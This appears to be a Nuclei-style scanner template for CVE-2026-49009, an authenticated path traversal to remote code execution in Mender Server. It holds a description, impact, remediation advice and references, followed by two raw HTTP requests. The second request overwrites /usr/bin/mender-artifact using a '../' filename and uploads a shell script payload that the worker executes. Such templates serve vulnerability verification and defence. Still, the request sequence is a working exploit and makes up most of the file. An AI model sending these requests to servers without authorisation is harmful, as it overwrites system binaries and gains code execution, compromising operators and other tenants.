README.md
Rendering markdown...
id: CVE-2026-49009
info:
name: Mender Server - Authenticated Path Traversal to RCE
author: j0xh-sec, inteleon404
severity: critical
description: |
Mender Server versions 4.1.0, 4.0.1, and below are vulnerable to an authenticated path traversal in the single-file artifact generation API endpoint. An attacker with a valid user account can supply a filename containing `../` traversal sequences (e.g. `../../../../usr/bin/mender-artifact`), causing the uploaded file payload to be written outside the intended directory. When the create-artifact-worker workflow later invokes the overwritten binary, the attacker's injected command is executed within the worker container, achieving remote code execution.
The flaw was fixed in Mender Server 4.1.1 (stable) and 4.0.2 (LTS) by hardening input validation in the single-file generation handler.
impact: |
Successful exploitation gives an authenticated attacker remote code execution inside the create-artifact-worker container. In multi-tenant Hosted Mender environments this can compromise artifacts belonging to other organizations sharing the same infrastructure.
remediation: |
Upgrade to Mender Server 4.1.1, 4.0.2, or later. Affected versions include all releases prior to and including 4.1.0 and 4.0.1 for both Mender Server Community (Open Source) and Mender Server Enterprise.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2026-49009
- https://mender.io/blog/cve-2026-49009-cve-2026-33552-input-sanitization-and-access-control-issues-in-mender-server
- https://app.opencve.io/cve/CVE-2026-49009
- https://www.tenable.com/cve/CVE-2026-49009
- https://docs.mender.io/release-information/release-notes-changelog/mender-server
- https://docs.mender.io/release-information/release-notes-changelog/mender-server-enterprise
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.9
cve-id: CVE-2026-49009
cwe-id: CWE-22
epss-score: 0.00180
epss-percentile: 0.59645
cpe: cpe:2.3:a:northern.tech:mender_server:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: northern.tech
product: mender_server
shodan-query: http.title:"Mender"
fofa-query: app="Mender"
tags: cve,cve2026,mender,path-traversal,rce,authenticated,intrusive
http:
- raw:
- |+
POST /api/management/v1/useradm/auth/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Authorization: Basic {{base64('{{username}}:{{password}}')}}
{}
- |+
POST /api/management/v1/deployments/artifacts/generate HTTP/1.1
Host: {{Hostname}}
Authorization: Bearer {{jwt}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}}
------WebKitFormBoundary{{randstr}}
Content-Disposition: form-data; name="name"
cve-poc-{{randhex_6}}
------WebKitFormBoundary{{randstr}}
Content-Disposition: form-data; name="description"
CVE-2026-49009 verification
------WebKitFormBoundary{{randstr}}
Content-Disposition: form-data; name="type"
single-file
------WebKitFormBoundary{{randstr}}
Content-Disposition: form-data; name="device_types_compatible"
qemu
------WebKitFormBoundary{{randstr}}
Content-Disposition: form-data; name="args"
Content-Type: application/json
{"filename":"../../../../usr/bin/mender-artifact","dest_dir":"/opt/mender/app","software_name":"demo","software_version":"1"}
------WebKitFormBoundary{{randstr}}
Content-Disposition: form-data; name="file"; filename="payload.sh"
Content-Type: application/octet-stream
#!/bin/sh
/usr/bin/id>/tmp/.cve-2026-49009
------WebKitFormBoundary{{randstr}}--
extractors:
- type: regex
name: jwt
part: body
internal: true
regex:
- "([A-Za-z0-9_\\-]+\\.[A-Za-z0-9_\\-]+\\.[A-Za-z0-9_\\-]+)"
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200'
- 'len(jwt) > 100'
- 'status_code_2 >= 200 && status_code_2 < 300'
- 'contains(to_string(header_2_all), "Location")'
condition: and